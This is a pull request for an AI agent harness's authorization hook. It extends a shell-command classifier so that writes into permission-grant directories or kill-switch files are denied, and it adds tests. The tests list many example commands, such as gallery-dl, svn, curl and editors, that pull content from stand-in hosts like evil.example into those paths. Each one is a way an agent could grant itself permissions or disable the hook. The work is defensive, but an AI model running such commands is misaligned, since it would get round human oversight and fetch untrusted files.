### PR TITLE
fix(authz): fail-closed UAT dest-form Shell residuals

### DIFF
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -20,6 +20,8 @@ and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0
 
 ### Fixed
 
+- **UAT Shell residual after #3354: dest-form writers plant authz or kill-switch (#3382).** Under active UAT, residual dest forms (`cmake -E copy`, `script`, `gallery-dl -d`, `megadl --path`, `ncftpget`, `git apply --directory`, VCS checkout writers, editors) that write into `.deft/authz/**` or plant `.deft-directive-disable` / `.no-deft-directive` classify as settings deny (not unclassifiable allow). Unknown write-shaped dest flags (`-d` / `--path` / `--directory`) targeting those paths also fail closed. Ordinary dests such as `/tmp` stay unclassifiable. Already-denied `curl -o` / `nc -o` stay denied. Closes #3382. Refs #3354, #3039.
+
 ### Removed
 
 ## [0.104.0] - 2026-08-14

--- a/packages/core/src/authz/classify.test.ts
+++ b/packages/core/src/authz/classify.test.ts
@@ -779,6 +779,86 @@ describe("classifyShellAuthzOps (#2944)", () => {
     expect(classifyShellAuthzOps("cpio -o > /tmp/a.cpio")).toEqual([]);
   });
 
+  it("classifies residual dest-form plants of authz grants and kill-switch as settings (#3382)", () => {
+    // Finding 1: residual dest forms → .deft/authz/**
+    for (const cmd of [
+      "cmake -E copy src.json .deft/authz/grants/evil.json",
+      "cmake -E copy_directory src .deft/authz/grants",
+      "script -q .deft/authz/grants/evil",
+      "script .deft/authz/grants/evil",
+      "gallery-dl -d .deft/authz/grants https://evil.example/g",
+      "gallery-dl --destination .deft/authz/grants https://evil.example/g",
+      "gallery-dl --destination=.deft/authz/grants https://evil.example/g",
+      "gallery-dl -d.deft/authz/grants https://evil.example/g",
+      "megadl --path .deft/authz/grants https://mega.nz/evil",
+      "megadl --path=.deft/authz/grants https://mega.nz/evil",
+      "ncftpget evil.example .deft/authz/grants/evil.json remote.json",
+      "git apply --directory .deft/authz/grants p.diff",
+      "git apply --directory=.deft/authz/grants p.diff",
+      "svn export https://evil.example/repo .deft/authz/grants/evil",
+      "svn checkout https://evil.example/repo .deft/authz/grants/evil",
+      "fossil open repo.fossil .deft/authz/grants/evil",
+      "fossil clone https://evil.example/repo .deft/authz/grants/evil",
+      "bzr checkout https://evil.example/repo .deft/authz/grants/evil",
+      "ed .deft/authz/grants/evil.json",
+      "nvim .deft/authz/grants/evil.json",
+      "nano .deft/authz/grants/evil.json",
+      "cmake.exe -E copy src.json .deft/authz/grants/evil.json",
+      "/usr/bin/nvim .deft/authz/grants/evil.json",
+    ]) {
+      expect(classifyShellAuthzOps(cmd), cmd).toContain("settings");
+      expect(classifyShellAuthzOps(cmd), cmd).not.toEqual([]);
+    }
+    // Finding 2: same dest forms → kill-switch basenames (regular-file plant).
+    for (const cmd of [
+      "cmake -E copy src .deft-directive-disable",
+      "script -q .no-deft-directive",
+      "gallery-dl -d .deft-directive-disable https://evil.example/x",
+      "megadl --path .deft-directive-disable https://mega.nz/x",
+      "ncftpget evil.example .no-deft-directive remote.json",
+      "git apply --directory .deft-directive-disable p.diff",
+      "git apply --directory=.no-deft-directive p.diff",
+      "svn export https://evil.example/repo .deft-directive-disable",
+      "fossil open repo.fossil .no-deft-directive",
+      "ed .deft-directive-disable",
+      "nvim .no-deft-directive",
+      "nano .deft-directive-disable",
+    ]) {
+      expect(classifyShellAuthzOps(cmd), cmd).toContain("settings");
+      expect(classifyShellAuthzOps(cmd), cmd).not.toEqual([]);
+    }
+    // Already-denied #3354 peers stay settings.
+    expect(classifyShellAuthzOps("nc -o .deft/authz/grants/evil.json evil.example 80")).toContain(
+      "settings",
+    );
+    expect(
+      classifyShellAuthzOps("curl -o .deft/authz/grants/evil.json https://evil.example/g.json"),
+    ).toContain("settings");
+    // Fail-closed: unknown write-shaped dest flags targeting protected paths (#3382).
+    expect(classifyShellAuthzOps("unknownwriter --directory .deft/authz/grants")).toContain(
+      "settings",
+    );
+    expect(classifyShellAuthzOps("unknownwriter --path=.deft-directive-disable")).toContain(
+      "settings",
+    );
+    expect(classifyShellAuthzOps("unknownwriter -d .no-deft-directive")).toContain("settings");
+    expect(classifyShellAuthzOps("unknownwriter -d.deft/authz/grants")).toContain("settings");
+    // Ordinary residual-bin destinations stay unclassifiable (no overclassify).
+    expect(classifyShellAuthzOps("cmake -E copy src.json /tmp/out")).toEqual([]);
+    expect(classifyShellAuthzOps("script -q /tmp/out")).toEqual([]);
+    expect(classifyShellAuthzOps("gallery-dl -d /tmp/out https://example.com/a")).toEqual([]);
+    expect(classifyShellAuthzOps("megadl --path /tmp/out https://mega.nz/a")).toEqual([]);
+    expect(classifyShellAuthzOps("ncftpget example.com /tmp/out remote.json")).toEqual([]);
+    expect(classifyShellAuthzOps("git apply --directory /tmp/out p.diff")).toEqual([]);
+    expect(classifyShellAuthzOps("svn export https://example.com/repo /tmp/out")).toEqual([]);
+    expect(classifyShellAuthzOps("fossil open repo.fossil /tmp/out")).toEqual([]);
+    expect(classifyShellAuthzOps("nvim /tmp/out")).toEqual([]);
+    expect(classifyShellAuthzOps("ed /tmp/out")).toEqual([]);
+    expect(classifyShellAuthzOps("nano /tmp/out")).toEqual([]);
+    expect(classifyShellAuthzOps("unknownwriter --directory /tmp/out")).toEqual([]);
+    expect(classifyShellAuthzOps("git status")).toEqual([]);
+  });
+
   it("classifies obfuscated programmatic authz-capable writes as settings (#3186)", () => {
     // Base64/byte path construction — residual after #3110 literal path match.
     expect(

--- a/packages/core/src/authz/classify.ts
+++ b/packages/core/src/authz/classify.ts
@@ -273,11 +273,27 @@ const DOWNLOADER_DECODER_BINS = new Set([
   "sqlite3",
   "crane",
   "objcopy",
+  // #3382 residual after #3354: dest forms that are not generic -o/--output/--outfile.
+  "cmake",
+  "script",
+  "gallery-dl",
+  "megadl",
+  "ncftpget",
+  "svn",
+  "fossil",
+  "bzr",
+  "cvs",
+  "darcs",
+  "ed",
+  "nvim",
+  "nano",
+  "vim",
+  "vi",
 ]);
 
 /**
  * Archive extractors / alt writers that can plant via pathish operands without
- * shell redirects (#3245 / #3288 / #3311 / #3336 / #3354). Used for pathish authz/kill scans (prefer deny)
+ * shell redirects (#3245 / #3288 / #3311 / #3336 / #3354 / #3382). Used for pathish authz/kill scans (prefer deny)
  * and write-shape residual under UAT — not bare curl-class URL fetches.
  */
 const ARCHIVE_ALT_WRITE_BINS = new Set([
@@ -350,10 +366,14 @@ const ARCHIVE_ALT_WRITE_BINS = new Set([
   "sqlite3",
   "crane",
   "objcopy",
+  // #3382 residual: dedicated dest-form writers (not general-purpose cmake/git/editors).
+  "gallery-dl",
+  "megadl",
+  "ncftpget",
 ]);
 
 /**
- * Bins whose pathish operands are scanned for authz/kill destinations (#3213 / #3245 / #3288 / #3311 / #3336 / #3354).
+ * Bins whose pathish operands are scanned for authz/kill destinations (#3213 / #3245 / #3288 / #3311 / #3336 / #3354 / #3382).
  * Prefer a Set over a long `||` chain so coverage counts one membership check, not N branches.
  */
 const PROTECTED_POSITIONAL_BINS = new Set([
@@ -416,6 +436,22 @@ const PROTECTED_POSITIONAL_BINS = new Set([
   "sqlite3",
   "crane",
   "objcopy",
+  // #3382 residual: positional dest writers (cmake copy / script / VCS / editors).
+  "cmake",
+  "script",
+  "gallery-dl",
+  "megadl",
+  "ncftpget",
+  "svn",
+  "fossil",
+  "bzr",
+  "cvs",
+  "darcs",
+  "ed",
+  "nvim",
+  "nano",
+  "vim",
+  "vi",
 ]);
 
 /** wget family (directory-prefix dest flags). */
@@ -433,6 +469,24 @@ const SQLITE3_OUTPUT_META = [".output", ".once"] as const;
 const TAR_FAMILY_BINS = new Set(["tar", "bsdtar", "gtar", "star", "gnutar"]);
 /** xh / httpie family (download-dir dest flags) (#3311). */
 const XH_FAMILY_BINS = new Set(["xh", "httpie"]);
+/** gallery-dl dest-dir flags (#3382). */
+const GALLERY_DL_FAMILY_BINS = new Set(["gallery-dl", "gallery_dl"]);
+const GALLERY_DL_DIR_DEST_FLAGS = new Set(["-d", "--destination", "--dest"]);
+/** megadl dest-path flags (#3382). */
+const MEGADL_FAMILY_BINS = new Set(["megadl"]);
+const MEGADL_PATH_DEST_FLAGS = new Set(["--path"]);
+/**
+ * Extra dest flags harvested on unknown write-shaped bins when dest is protected (#3382).
+ * Not merged into DOWNLOADER_FILE_DEST_FLAGS: curl `-d` is POST data, not a file dest.
+ */
+const GENERIC_PROTECTED_EXTRA_DEST_FLAGS = new Set([
+  "-d",
+  "--dir",
+  "--destination",
+  "--dest",
+  "--path",
+  "--directory",
+]);
 
 /**
  * File destination flags for downloaders/decoders (#3206).
@@ -537,6 +591,8 @@ function isDownloaderDestFlag(flag: string, bin: string, rawFlag?: string): bool
   if (UNZIP_DIR_DEST_BINS.has(bin) && UNZIP_DIR_DEST_FLAGS.has(flag)) return true;
   if (XH_FAMILY_BINS.has(bin) && XH_DIR_DEST_FLAGS.has(flag)) return true;
   if (ATOOL_FAMILY_BINS.has(bin) && ATOOL_DIR_DEST_FLAGS.has(flag)) return true;
+  if (GALLERY_DL_FAMILY_BINS.has(bin) && GALLERY_DL_DIR_DEST_FLAGS.has(flag)) return true;
+  if (MEGADL_FAMILY_BINS.has(bin) && MEGADL_PATH_DEST_FLAGS.has(flag)) return true;
   return false;
 }
 /**
@@ -711,6 +767,12 @@ function downloaderDecoderDestinations(tokens: readonly string[]): string[] {
         }
         // aria2c / aria2 attached -dDIR (#3213 / #3288)
         if (ARIA2_FAMILY_BINS.has(bin) && n.startsWith("-d") && n.length > 2) {
+          dests.push(pathishToken(raw.slice(2)));
+          i++;
+          continue;
+        }
+        // gallery-dl attached -dDIR (#3382)
+        if (GALLERY_DL_FAMILY_BINS.has(bin) && n.startsWith("-d") && n.length > 2) {
           dests.push(pathishToken(raw.slice(2)));
           i++;
           continue;
@@ -917,10 +979,15 @@ function pathishIsProtectedDest(pathish: string): boolean {
   return pathishIsAuthzDir(pathish) || pathishMentionsKillSwitch(pathish);
 }
 
+function isGenericProtectedDestFlag(flag: string): boolean {
+  return DOWNLOADER_FILE_DEST_FLAGS.has(flag) || GENERIC_PROTECTED_EXTRA_DEST_FLAGS.has(flag);
+}
+
 /**
- * Fail-closed dest harvest for write-shaped Shell under UAT (#3354).
+ * Fail-closed dest harvest for write-shaped Shell under UAT (#3354 / #3382).
  * Named-bin parsers above are not the only path: any token that looks like
- * `-o` / `--output` / `--outfile` / `--output-file` (or attached `-oDIR`)
+ * `-o` / `--output` / `--outfile` / `--output-file` / `-d` / `--dir` /
+ * `--destination` / `--path` / `--directory` (or attached `-oDIR` / `-dDIR`)
  * whose dest is authz/kill-switch is collected even when the bin is unknown.
  * scp `-o` (OpenSSH option) and cpio `-o` (copy-out) stay excluded.
  */
@@ -952,7 +1019,7 @@ function genericProtectedDests(tokens: readonly string[]): string[] {
     if (n.includes("=") && (n.startsWith("-") || n.startsWith("--"))) {
       const eq = raw.indexOf("=");
       const flag = normalizeToken(raw.slice(0, eq));
-      if (DOWNLOADER_FILE_DEST_FLAGS.has(flag)) {
+      if (isGenericProtectedDestFlag(flag)) {
         const dest = pathishToken(raw.slice(eq + 1));
         if (pathishIsProtectedDest(dest)) dests.push(dest);
       }
@@ -969,7 +1036,12 @@ function genericProtectedDests(tokens: readonly string[]): string[] {
       if (pathishIsProtectedDest(dest)) dests.push(dest);
       continue;
     }
-    if (DOWNLOADER_FILE_DEST_FLAGS.has(n)) {
+    if (n.startsWith("-") && !n.startsWith("--") && n.startsWith("-d") && n.length > 2) {
+      const dest = pathishToken(raw.slice(2));
+      if (pathishIsProtectedDest(dest)) dests.push(dest);
+      continue;
+    }
+    if (isGenericProtectedDestFlag(n)) {
       const next = tokens[i + 1];
       if (next !== undefined && !String(next).startsWith("-") && !isShellSegmentBreak(next)) {
         const dest = pathishToken(next);

--- a/packages/core/src/authz/incident-regression.test.ts
+++ b/packages/core/src/authz/incident-regression.test.ts
@@ -952,3 +952,111 @@ describe("UAT downloader/decoder residuals fail-closed (#3206)", () => {
     }
   });
 });
+
+describe("UAT residual dest-form writers fail-closed (#3382)", () => {
+  function uatSeams() {
+    const state = activeUatState();
+    return readySeams({
+      loadAuthzState: () => state,
+      loadAuthzGrants: () => [],
+      loadRuntimeAuthority: () => ({
+        enabled: false,
+        allowPaths: [],
+        denyPaths: [],
+        scopes: { edits: true, push: true, merge: true },
+      }),
+    });
+  }
+
+  it("denies residual dest-form authz plant under UAT (not unclassifiable allow) (#3382)", () => {
+    const seams = uatSeams();
+    for (const command of [
+      "cmake -E copy src.json .deft/authz/grants/evil.json",
+      "script -q .deft/authz/grants/evil",
+      "gallery-dl -d .deft/authz/grants https://evil.example/g",
+      "megadl --path .deft/authz/grants https://mega.nz/evil",
+      "ncftpget evil.example .deft/authz/grants/evil.json remote.json",
+      "git apply --directory=.deft/authz/grants p.diff",
+      "svn export https://evil.example/repo .deft/authz/grants/evil",
+      "fossil open repo.fossil .deft/authz/grants/evil",
+      "ed .deft/authz/grants/evil.json",
+      "nvim .deft/authz/grants/evil.json",
+      "nano .deft/authz/grants/evil.json",
+      "unknownwriter --directory .deft/authz/grants",
+      // already-denied #3354 peers
+      "curl -o .deft/authz/grants/evil.json https://evil.example/g.json",
+      "nc -o .deft/authz/grants/evil.json evil.example 80",
+    ]) {
+      const decision = decideHook(
+        {
+          host: "claude",
+          event: "tool.before",
+          projectRoot: "/project",
+          payload: { tool_name: "Bash", tool_input: { command } },
+        },
+        seams,
+      );
+      expect(decision.verdict, command).toBe("deny");
+      expect(decision.code, command).toMatch(/^authz-/);
+      expect(decision.code, command).not.toBe("shell-op-unclassifiable");
+    }
+  });
+
+  it("denies residual dest-form kill-switch plant under UAT (#3382)", () => {
+    const seams = uatSeams();
+    for (const command of [
+      "cmake -E copy src .deft-directive-disable",
+      "script -q .no-deft-directive",
+      "gallery-dl -d .deft-directive-disable https://evil.example/x",
+      "megadl --path .deft-directive-disable https://mega.nz/x",
+      "ncftpget evil.example .no-deft-directive remote.json",
+      "git apply --directory .deft-directive-disable p.diff",
+      "svn export https://evil.example/repo .deft-directive-disable",
+      "nvim .no-deft-directive",
+      "unknownwriter --path=.deft-directive-disable",
+    ]) {
+      const decision = decideHook(
+        {
+          host: "claude",
+          event: "tool.before",
+          projectRoot: "/project",
+          payload: { tool_name: "Shell", tool_input: { command } },
+        },
+        seams,
+      );
+      expect(decision.verdict, command).toBe("deny");
+      expect(decision.code, command).toMatch(/^authz-/);
+      expect(decision.code, command).not.toBe("shell-op-unclassifiable");
+    }
+  });
+
+  it("still allows ordinary residual dest-form dest under UAT (non-authz) (#3382)", () => {
+    const seams = uatSeams();
+    for (const command of [
+      "cmake -E copy src.json /tmp/out",
+      "script -q /tmp/out",
+      "gallery-dl -d /tmp/out https://example.com/a",
+      "megadl --path /tmp/out https://mega.nz/a",
+      "ncftpget example.com /tmp/out remote.json",
+      "git apply --directory /tmp/out p.diff",
+      "svn export https://example.com/repo /tmp/out",
+      "nvim /tmp/out",
+      "unknownwriter --directory /tmp/out",
+    ]) {
+      const decision = decideHook(
+        {
+          host: "claude",
+          event: "tool.before",
+          projectRoot: "/project",
+          payload: {
+            tool_name: "Bash",
+            tool_input: { command },
+          },
+        },
+        seams,
+      );
+      expect(decision.verdict, command).toBe("allow");
+      expect(decision.code, command).toBe("shell-op-unclassifiable");
+    }
+  });
+});


### PR DESCRIPTION
## Summary

Under active UAT, residual write-capable Shell dest forms that are not generic `-o` / `--output` / `--outfile` still classified empty and allowed planting `.deft/authz` grants or a `.deft-directive-disable` / `.no-deft-directive` kill-switch.

This extends dest harvest in `packages/core/src/authz/classify.ts`:

- Named dest forms: `cmake -E copy`, `script`, `gallery-dl -d`, `megadl --path`, `ncftpget`, `git apply --directory`, VCS checkout writers, editors
- Fail-closed extra dest flags on unknown write-shaped bins: `-d` / `--dir` / `--destination` / `--path` / `--directory`
- Ordinary `/tmp` dests stay unclassifiable
- `curl -o` / `nc -o` remain settings-denied

## Test plan

- [x] `pnpm exec vitest run packages/core/src/authz` (175 passed)
- [x] classify + decideHook regressions vs residual dest forms and `#3354` peers
- [x] CHANGELOG `[Unreleased]` security note

Closes #3382
